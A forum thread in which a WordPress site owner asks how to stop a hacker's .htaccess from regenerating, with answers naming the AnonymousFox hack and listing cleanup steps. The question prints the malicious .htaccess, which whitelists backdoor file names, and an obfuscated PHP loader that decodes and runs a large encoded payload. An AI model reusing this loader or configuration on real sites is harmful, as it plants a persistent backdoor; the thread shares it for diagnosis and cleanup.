# How to block modification of .htaccess file wordpress

Tags: wordpress, .htaccess, permissions, code-injection

please tell me what can I do to protect my .htaccess file ? Recently I was hacked and I noticed that I can navigate into different place of my wp-admin (Posts, settings, plugins,...) they show permission page - forbiden. A .htaccess is generate and also an index.php and themes.php is added to root. I've deleted the .htaccess file, index.php and themes.php and I've created a new .htaccees which content many lines of protection rules, but it's always replaced by a new. How can I track the hacked script please ?

Code of hacked .htaccess:

```
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
```

Code of index.php:

`<?php $zdHKDPrQNF='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$zdHKDPrQNF[(105/15)].$zdHKDPrQNF[(26-1)].$zdHKDPrQNF[(1*49)].$zdHKDPrQNF[((10*1)+18)].$zdHKDPrQNF[(14+22)].$zdHKDPrQNF[(44+5)].$zdHKDPrQNF[(44-13)].$zdHKDPrQNF[(684/18)].$zdHKDPrQNF[(23+4)].$zdHKDPrQNF[(72-(33-7))].$zdHKDPrQNF[(154/22)].$zdHKDPrQNF[(11+25)].$zdHKDPrQNF[(65-(62-31))].$zdHKDPrQNF[(26-6)].$zdHKDPrQNF[((27*2)-8)];$pHFdNhg9688=$zdHKDPrQNF[(20-9)].$zdHKDPrQNF[(2*4)].$zdHKDPrQNF[(29*1)].$zdHKDPrQNF[(160/4)];$MYtraky2482=$zdHKDPrQNF[(8*5)].$zdHKDPrQNF[((1+0)+2)].$zdHKDPrQNF[(6+(1*(95/19)))].$zdHKDPrQNF[(140/5)].$zdHKDPrQNF[(522/18)].$zdHKDPrQNF[(7*((7-3)-2))].$zdHKDPrQNF[(2*14)].$zdHKDPrQNF[(138/(2+4))].$zdHKDPrQNF[(1029/(378/18))].$zdHKDPrQNF[((2*189)/9)].$zdHKDPrQNF[(12+(0+0))].$zdHKDPrQNF[(31*1)].$zdHKDPrQNF[(48/(36/12))].$zdHKDPrQNF[(735/15)].$zdHKDPrQNF[(0+7)].$zdHKDPrQNF[(18+2)].$zdHKDPrQNF[(18-(10/5))].$zdHKDPrQNF[(735/15)].$zdHKDPrQNF[(0+(2-(1*1)))].$zdHKDPrQNF[(16-(3+(36/(0+18))))].$zdHKDPrQNF[((167-23)/18)].$zdHKDPrQNF[(0+(18-9))].$zdHKDPrQNF[(1*3)].$zdHKDPrQNF[(11*(1+(0/(78/13))))].$zdHKDPrQNF[(2*7)].$zdHKDPrQNF[(29*(0+1))].$zdHKDPrQNF[(38-(8+9))].$zdHKDPrQNF[(15*2)].$zdHKDPrQNF[(45-11)].$zdHKDPrQNF[(1*46)].$zdHKDPrQNF[(1*(17+21))].$zdHKDPrQNF[(78/3)].$zdHKDPrQNF[(21+(77/11))].$zdHKDPrQNF[(22+14)].$zdHKDPrQNF[(343/(91/13))].$zdHKDPrQNF[(1*1)].$zdHKDPrQNF[(21-10)].$zdHKDPrQNF[(22+(12/2))].$zdHKDPrQNF[(180/20)].$zdHKDPrQNF[(3+((0+0)*1))].$zdHKDPrQNF[(686/(126/9))].$zdHKDPrQNF[(61-(32-8))].$zdHKDPrQNF[(476/17)].$zdHKDPrQNF[((4-0)+22)].$zdHKDPrQNF[(((23-(2*5))/13)-0)].$zdHKDPrQNF[(7+(84/21))].$zdHKDPrQNF[(28/2)].$zdHKDPrQNF[(9-0)].$zdHKDPrQNF[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>`

Comment: Do you have the so called messed up .htaccess contents with you ?  As permalinks and cache plugins can make changes .

Comment: You can update the .htaccess permission to 0644.
After changing the permission to 0644 it will not be updated by any plugins.

Comment: I just triedand nor works....  he also changed

Answer (score 0):

This is an AnonymousFox hack. It is very sophisticated. See these steps to clean your hacked hosting account > https://forum.ait-pro.com/forums/topic/wp-dester-and-wpyii2-hacker-plugins/

Answer (score 0):

1. Create lock666.php as a folder
2. Check if there is a suspicious cron job, delete it if any.
3. remove all newly created .htaccess file
4. remove all license.txt files
5. remove all suspicious new .php file
   [random file name](https://i.stack.imgur.com/aDKtF.png)

if after creating the "lock666.php" folder you can't edit the .htaccess and index.php files, rename them to the ones in the hacked .htaccess file